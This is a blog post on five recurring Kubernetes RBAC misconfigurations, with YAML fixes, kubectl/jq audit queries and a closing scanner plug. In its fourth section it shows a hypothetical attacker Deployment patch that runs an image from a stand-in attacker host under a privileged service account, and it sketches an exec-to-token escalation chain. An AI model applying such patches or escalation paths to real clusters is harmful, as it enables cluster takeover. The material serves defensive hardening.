
Kubernetes RBAC: The Same Five Misconfigs, Every Single Cluster

Patrick Putman · February 12, 2025 · 8 min read

I've reviewed a lot of GKE clusters. The RBAC findings are almost identical every time — not because teams are careless, but because Kubernetes makes it genuinely easy to get this wrong. The API is expressive, the docs are decent, and the security implications of specific verb combinations are buried in implementation details that nobody reads until something goes wrong.

Here are the five patterns I find in nearly every cluster I look at.

1. cluster-admin bindings on service accounts

This is the most common one, and the blast radius is enormous:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: my-app-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: my-app
    namespace: production

I know exactly how this happens. Someone needed to get something working quickly — usually a Helm chart that kept failing on permissions — got it working, shipped it, and moved on. The service account is now cluster-admin. Anyone who can exec into a pod running as that service account, or who can create a pod in that namespace, effectively owns the cluster.

I've seen this in fintech. I've seen it in healthcare. The team that set it up is almost never the team I'm talking to when I find it.

Fix: Audit what the application actually needs and create a Role scoped to exactly those resources and verbs. Start with kubectl auth can-i --list --as=system:serviceaccount:production:my-app to see the current effective permissions.
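As a sketch of where that lands — assuming the audit showed my-app only reads ConfigMaps and watches its own pods (the resources and verbs here are illustrative; substitute whatever auth can-i actually reported) — the replacement is a namespaced Role plus RoleBinding:

```yaml
# Least-privilege sketch: scope to exactly what the audit surfaced.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: my-app
  namespace: production
rules:
  - apiGroups: [""]
    resources: ["configmaps"]      # illustrative -- match your audit
    verbs: ["get", "list", "watch"]
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: my-app
  namespace: production
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role                       # namespaced Role, not a ClusterRole
  name: my-app
subjects:
  - kind: ServiceAccount
    name: my-app
    namespace: production
```

The important structural change is the roleRef kind: a RoleBinding to a namespaced Role caps the blast radius at one namespace even if the verb list later grows.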

2. Wildcard verbs in custom roles

rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["*"]

The * wildcard expands to every verb on the resource: get, list, watch, create, update, patch, delete, deletecollection. Exec and port-forward are technically subresources (pods/exec, pods/portforward) and need their own rules — but the same least-resistance habit that wildcards verbs tends to wildcard resources too, and resources: ["*"] sweeps the subresources in. Pod exec alone is often sufficient for container escape in environments without strong admission controls. This pattern always starts as ["get", "list", "watch"] and grows to ["*"] when someone hits a permissions error under pressure and takes the path of least resistance.

Pod exec → shell in a container → read the service account token → call the Kubernetes API with the service account's permissions → iterate until you find something useful. It's not sophisticated. It's methodical.

Fix: Enumerate verbs explicitly. If you need get, list, and watch, write those three verbs.
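The corrected rule is small enough to write out in full — a sketch, with exec staying out of reach because pods/exec is never granted:

```yaml
# Read-only access to pods. Exec and port-forward remain denied
# because the pods/exec and pods/portforward subresources never
# appear in this rule.
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["get", "list", "watch"]
```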

3. Impersonation rights

rules:
  - apiGroups: [""]
    resources: ["users", "groups", "serviceaccounts"]
    verbs: ["impersonate"]

This lets the bearer act as any user or service account in the cluster — including system:masters. I find this most often on CI/CD runner service accounts that were granted impersonation so they could deploy on behalf of other identities. That made sense for the use case. The problem is the implementation grants impersonation across all users and groups, not just the specific identities the pipeline actually needs to act as.

Impersonation is effectively cluster-admin

Any principal with impersonation rights on users and groups can impersonate system:masters. Treat it with the same weight as binding cluster-admin directly — because it is.
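If the pipeline genuinely needs to deploy as another identity, impersonation can be narrowed with resourceNames rather than removed. A sketch, using a hypothetical deployer service account in one namespace:

```yaml
# Scoped impersonation sketch: the CI runner may assume exactly one
# identity, not every user and group in the cluster.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ci-impersonator        # hypothetical name
  namespace: production
rules:
  - apiGroups: [""]
    resources: ["serviceaccounts"]
    verbs: ["impersonate"]
    resourceNames: ["deployer"]  # the only identity the pipeline can act as
```

Because this is a namespaced Role with an explicit resourceNames list, system:masters and every other group stay unreachable.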

4. Namespace-scoped roles that escalate to cluster scope

A Role in namespace A can't directly affect namespace B. But it can create a path there. The ones I find most often:

  • Create Secrets → can create a secret that a mutating webhook reads and uses cluster-wide
  • Create ServiceAccounts → can create a service account and run pods as a higher-privileged SA in the same namespace
  • Patch Deployments → can inject environment variables, modify the command, change the image to your own
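The Deployment-patch path is worth seeing concretely. This is a hypothetical strategic-merge patch — the SA name, image, and container name are invented for illustration — that an attacker holding only patch on Deployments could apply with kubectl patch:

```yaml
# Hypothetical patch: swap the image and run it under a more
# privileged service account that already exists in the namespace.
# kubectl patch deployment my-app -n production --patch-file pwn.yaml
spec:
  template:
    spec:
      serviceAccountName: privileged-operator    # hypothetical higher-privileged SA
      containers:
        - name: app                              # must match the existing container name
          image: attacker.example.com/payload:latest
```

No pod-creation or exec permission was needed; the Deployment controller does the rest.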

The pattern: you think you're granting access to one namespace, but the permissions interact with cluster-level mechanics that weren't in scope when the role was designed.

Fix: When granting create/patch/update on workload resources, think through what an attacker with only those permissions could do with five minutes and kubectl auth can-i.

5. RBAC roles that grant RBAC management

rules:
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
    verbs: ["create", "patch", "update", "bind", "escalate"]

A principal with these rights can grant itself — or anything it controls — any permission in the cluster. The bind and escalate verbs deserve special attention. bind allows binding a role to any subject. escalate allows modifying roles to include permissions the modifier doesn't already have, bypassing Kubernetes's normal escalation protection.

I see this on operator service accounts and in multi-tenant clusters where teams were given self-service namespace management. The intent was good. The implementation handed them the keys.
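The self-service use case has a narrower shape. One common pattern, sketched here: teams manage RoleBindings themselves, but the bind verb is pinned with resourceNames to a fixed set of built-in roles, and escalate is never granted:

```yaml
# Self-service namespace management without handing over the keys:
# teams can create and remove bindings, but only to admin/edit/view.
rules:
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources: ["rolebindings"]
    verbs: ["create", "update", "delete", "get", "list"]
  - apiGroups: ["rbac.authorization.k8s.io"]
    resources: ["clusterroles"]
    verbs: ["bind"]
    resourceNames: ["admin", "edit", "view"]   # nothing self-authored, no cluster-admin
```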

How to audit your own cluster

# Find all ClusterRoleBindings to cluster-admin
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name == "cluster-admin") | .metadata.name, .subjects'

# List all roles with wildcard verbs
kubectl get roles,clusterroles -A -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'

# Check effective permissions for a service account
kubectl auth can-i --list --as=system:serviceaccount:production:my-app
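The queries above cover findings 1 and 2; a sketch of one more, in the same style, surfaces findings 3 and 5 (requires jq 1.5+ for IN):

```shell
# Find roles carrying impersonate, bind, or escalate verbs
kubectl get roles,clusterroles -A -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? | IN("impersonate", "bind", "escalate")) | .metadata.name'
```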

None of these findings require a sophisticated attacker. They require someone patient enough to enumerate the cluster, which takes about twenty minutes with these one-liners.

If you want this automated and mapped to attack paths, Beacon's Kubernetes scanner handles it. For now, these queries will surface the critical patterns.
